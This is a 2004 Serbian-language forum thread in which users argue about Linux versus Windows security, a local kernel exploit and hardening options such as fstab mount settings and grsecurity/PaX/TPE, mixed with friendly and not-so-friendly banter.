Pod linuxom, po defaultu, je jako malo servisa podignuto. Cak verujem, da sto se distribucije budu vise priblizavale korisniku, sve ce vise tih servera i servercica biti iskljuceno iz distribucija. Pod linuxom je po defaultu sve iskljuceno, pa ti ukljucuj sta ti treba (zato je i instalacija i podesavanje malo zeznutije, ko ne zna, nego pod windowsom).
I windows moze, ako se pazljivo koristi, da bude dobar, ali ja sam toliko navikao na ovo moje c[ue]do da vec mesecima odlazem i upgrade, a o promeni sistema da i ne govorimo.
Drago mi je da je diskusija zalicila na nesto. Vise bi, ipak, voleo da se zapocne jedna (na Linux ili nekon drugom forumu) kako uciniti Linux bezbednijim, neke finte iskusnih linux admina, i sl. To bi koristilo svima. I linux vernici bi mozda shvatili koliko im je sistem u stvari nesiguran, i mi pocetnici puni entuzijazma bi mogli stosta da naucimo.
[ Dragi Tata @ 16.06.2004. 13:25 ] @
Citat:
VRider: I linux vernici bi mozda shvatili koliko im je sistem u stvari nesiguran, i mi pocetnici puni entuzijazma bi mogli stosta da naucimo.


Hej, polako. Sa kim ću ovde da se prepucavam, ako i ti priznaš da je Linux nesiguran? Popaj slabo navraća u poslednje vreme, caiser je neredovan, jedino ako zi: počne češće da navraća...
[ VRider @ 16.06.2004. 14:03 ] @
Citat:
I linux vernici bi mozda shvatili koliko im je sistem u stvari nesiguran.

Ovo je malo dvosmisleno. Ti si, naravno, stvari shvatio onako kako ti odgovara.
Kako nam se interesovanja ne preklapapaju (trenutno, ne kazem da nekad nece), od tebe nemam nesto posebno da naucim, a za prepucavanje bas i nemam vremena... U zdravlje. (Cak cu i Advocacy da stavim na ignore neko vreme)
[ Dragi Tata @ 16.06.2004. 15:30 ] @
Citat:
VRider: U zdravlje. (Cak cu i Advocacy da stavim na ignore neko vreme)


Ih, sad. Da sam zlopamtilo kao što nisam, još bih rekao nešto kao:

Citat:
VRider: Nakon sto pokazete svoju punu verbalnu nemoc i neobavestenost, palite kao i uvek...

[ flylord @ 17.06.2004. 11:17 ] @
E Tatko, lako je tebi da se prepucavas sa klincima i neukim ljudima koji su tek poceli da se uce, sacekaj da porastu pa ces da vidis;)
A sto se tice prikaza hackovanovih hostova, to bas i nije relevantna cinjenica kao sto, pretpostavljam, i sam znas. Prvo, ima mnogo firmi koje ne zele da kazu da su hakovane ili cak i ne znaju da su hakovane. Drugo sta je sa DDOS napadima? Najlakse se izvode sa Win sistemima, jer ih najcesce koriste neuki ljudi koji i ne znaju da su im utrapili trojanca koji sluzi za DDOS. Dalje neki od ovih email crva (virusa) imaju trojanca u sebi, ili sluze za DDOS i sl. Pa jel host machina koja ima crva haknuta ili ne?? Ako ima trojanca, to omogucava vlasniku trojanca da koristi taj kompjuter za sta pozeli. Tako da u nekim trenucima, moze se reci da postoji i po nekolko miliona ili barem 100-na hiljada hakovanih Win kompjutera.
Ovaj kernel exploit je localnog tipa (sto ne mora da znaci da ne moze da se iskoristi sa remote hosta) tako da on i nije tolko opasan kolko i win exploiti i virusi (ovi sto se pojavljuju u poslednje vreme).
i..
e pa mrzi me vise da pisem, losa mi ova tastatura
[ Dragi Tata @ 17.06.2004. 17:57 ] @
Citat:
flylord:
A sto se tice prikaza hackovanovih hostova, to bas i nije relevantna cinjenica kao sto, pretpostavljam, i sam znas.


Sve ja to znam i slažem se, ali kad mi indijanci krenu sa pričama kako Win puca svakih pet minuta i kako je inherentno nesiguran, moram da im prezentujem neke brojke da ih malo spustim na zemlju. Znam i sam da te brojke u praksi ne znače mnogo, ali indijanci nemaju ama baš ništa osim prazne galame ;)
[ stalker @ 17.06.2004. 18:17 ] @
Sad listam ovu temu od pocetka i pogledam
www.unixsucks.com
i glasam na sajtu. Nagradno pitanje: ko je trenutni pobednik glasanja?
Ironija, nema sta:)
[ flylord @ 18.06.2004. 12:31 ] @
Citat:
Dragi Tata:Sve ja to znam i slažem se, ali kad mi indijanci krenu sa pričama kako Win puca svakih pet minuta i kako je inherentno nesiguran, moram da im prezentujem neke brojke da ih malo spustim na zemlju. Znam i sam da te brojke u praksi ne znače mnogo, ali indijanci nemaju ama baš ništa osim prazne galame


Da ali ga malko preterujes Ne moras odmah da ih ubijes u pojam, idi palagano, taman sam poceo da uzivam u ovom tredu, kad ih ti sve otera, maltene na pocetku;) Zamisli da se svi oni razocaraju u zivot i svoj OS, ipak su oni nasi buduci strucnjaci (ovo je receno bez sarkazma) . Kad nekog brzo spustis na zemlju on moze da dobije teske frustracije, i zamisli sta se desava sa detetom koje poraste a imalo je tako nesto u svom detinjstvu... Uzas, ja jedva da mogu da zamislim ...
poz
[ Palma @ 26.06.2004. 15:21 ] @
Citat:
flylord
E Tatko, lako je tebi da se prepucavas sa klincima i neukim ljudima


Jel' ti to praviš neki profil ljudi iz Linux tabora, il' se to meni samo čini? Sad ispade da su Linux korisnici neuki, što možda i (ni)je daleko od istine
[ flylord @ 28.06.2004. 12:49 ] @
Ne pravim profil ljudi iz Linux tabora, jer sam i ja iz Linux tabora. To je bila inace sala a delimicno i istina za klince sa ES-a koji bi da se prepiru bez argumenata (cesto ih i ne znaju) cak i u slucajevima kada argumenti postoje, a celo razmisljanje im je prozeto emocijama, koje, po meni , kad je posao u pitanju nemaju razloga da postoje. Ja koristim Linux vec koju godinu, radim pod njim, zaradjujem sa njim, sve radim pod Linuxim, kuci imam samo Linux ..., i opet kad mi neko plati da radi pod Dos-om, ja cu da radim pod Dosom. Zasto!? Zato sto me placaju za pod dos a za pod Linux, i meni nista ne znaci u zivotu pod kojim sistemom cu da radim ...
tolko od mene za sada
poz
[ B o j a n @ 07.07.2004. 18:01 ] @
zanimljivo je to sto niko nije primetio da se 99% lokalnih napada uz pomoc ovog bug-a moze preventovati citanjem:

man 5 fstab
i
man 1 chmod

a sto se tice grsec-a, hmm... voleo bih da vidim da se taj kod izvrsi kroz pax+tpe



eh ti admini ;)


p.s.
@ zi::
dobar ti taj laptop kada ga nisi pomerio 140 dana, zajebi to, nabavi mainframe ;)

[ popeye @ 07.07.2004. 21:45 ] @
Ne slažem se, jer:

a) pax baš i nije najsrećnije rešenje za stack overflow.
b) tpe se zaobilazi korišćenjem interpretera.
c) problem leži u lošem kodu koji se mora ispraviti, ovo su samo zaptivači na koje se ne treba oslanjati.